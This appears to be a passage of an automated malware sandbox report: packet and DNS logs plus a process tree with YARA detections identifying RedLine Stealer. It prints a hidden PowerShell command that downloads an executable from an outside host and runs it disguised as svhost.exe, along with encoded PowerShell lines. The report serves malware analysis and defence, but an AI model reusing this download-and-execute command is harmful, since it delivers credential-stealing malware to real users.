                                                  Feb 2, 2023 08:09:15.542722940 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.542757034 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.542788029 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.542815924 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.542836905 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.550576925 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550817013 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550906897 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.550935030 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550961971 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.550981045 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.550985098 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551001072 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551059008 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551239967 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551351070 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551606894 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551692963 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.551873922 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.551949978 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552000046 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.552057028 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552083969 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.552155018 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552211046 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.552273989 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.552301884 CET44349696185.101.226.22192.168.2.4
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 2, 2023 08:09:14.959439993 CET | 56572 | 53 | 192.168.2.4 | 8.8.8.8
Feb 2, 2023 08:09:15.053035021 CET | 53 | 56572 | 8.8.8.8 | 192.168.2.4
Feb 2, 2023 08:11:28.001291037 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8
Feb 2, 2023 08:11:28.033365965 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 2, 2023 08:09:14.959439993 CET | 192.168.2.4 | 8.8.8.8 | 0x5cdb | Standard query (0) | oiartzunirratia.eus | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:11:28.001291037 CET | 192.168.2.4 | 8.8.8.8 | 0x574e | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:11:28.033365965 CET | 192.168.2.4 | 8.8.8.8 | 0xb18f | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 2, 2023 08:09:15.053035021 CET | 8.8.8.8 | 192.168.2.4 | 0x5cdb | No error (0) | oiartzunirratia.eus | - | 185.101.226.22 | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:11:28.023376942 CET | 8.8.8.8 | 192.168.2.4 | 0x574e | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 2, 2023 08:11:28.053335905 CET | 8.8.8.8 | 192.168.2.4 | 0xb18f | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001) | false
Contacted hosts:
• oiartzunirratia.eus
• 194.26.192.248:7053


Target ID: 0
Start time: 08:09:10
Start date: 02/02/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
Imagebase: 0x7ff7b7b10000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.327507977.000001D9DA350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
• Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.327351810.000001D9DA340000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
• Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.381690727.000001D9F43C3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
• Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000000.00000002.327507977.000001D9DA359000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
Reputation: high

Target ID: 1
Start time: 08:09:10
Start date: 02/02/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 08:09:16
Start date: 02/02/2023
Path: C:\Users\user\AppData\Roaming\svhost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\svhost.exe"
Imagebase: 0xd30000
File size: 1262592 bytes
MD5 hash: D3713110654DC546BD5EDC306A6E7EFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: HKTL_NET_NAME_DotNetInject, Description: Detects .NET red/black-team tools via name, Source: 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.464775648.0000000005960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 41%, ReversingLabs
Reputation: low

Target ID: 3
Start time: 08:09:32
Start date: 02/02/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xa0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 4
Start time: 08:09:33
Start date: 02/02/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 7
Start time: 08:10:00
Start date: 02/02/2023
Path: C:\Users\user\AppData\Roaming\svhost.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\svhost.exe
Imagebase: 0xe00000
File size: 1262592 bytes
MD5 hash: D3713110654DC546BD5EDC306A6E7EFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 8
Start time: 08:10:00
Start date: 02/02/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 9
Start time: 08:10:10
Start date: 02/02/2023
Path: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
Imagebase: 0xff0000
File size: 1262592 bytes
MD5 hash: D3713110654DC546BD5EDC306A6E7EFD
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 41%, ReversingLabs
Reputation: low

Target ID: 10
Start time: 08:10:19
Start date: 02/02/2023
Path: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
Imagebase: 0x90000
File size: 1262592 bytes
MD5 hash: D3713110654DC546BD5EDC306A6E7EFD
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 11
Start time: 08:10:52
Start date: 02/02/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xa0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 12
Start time: 08:10:52
Start date: 02/02/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 16
Start time: 08:11:11
Start date: 02/02/2023
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xa0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET

Target ID: 17
Start time: 08:11:11
Start date: 02/02/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

No disassembly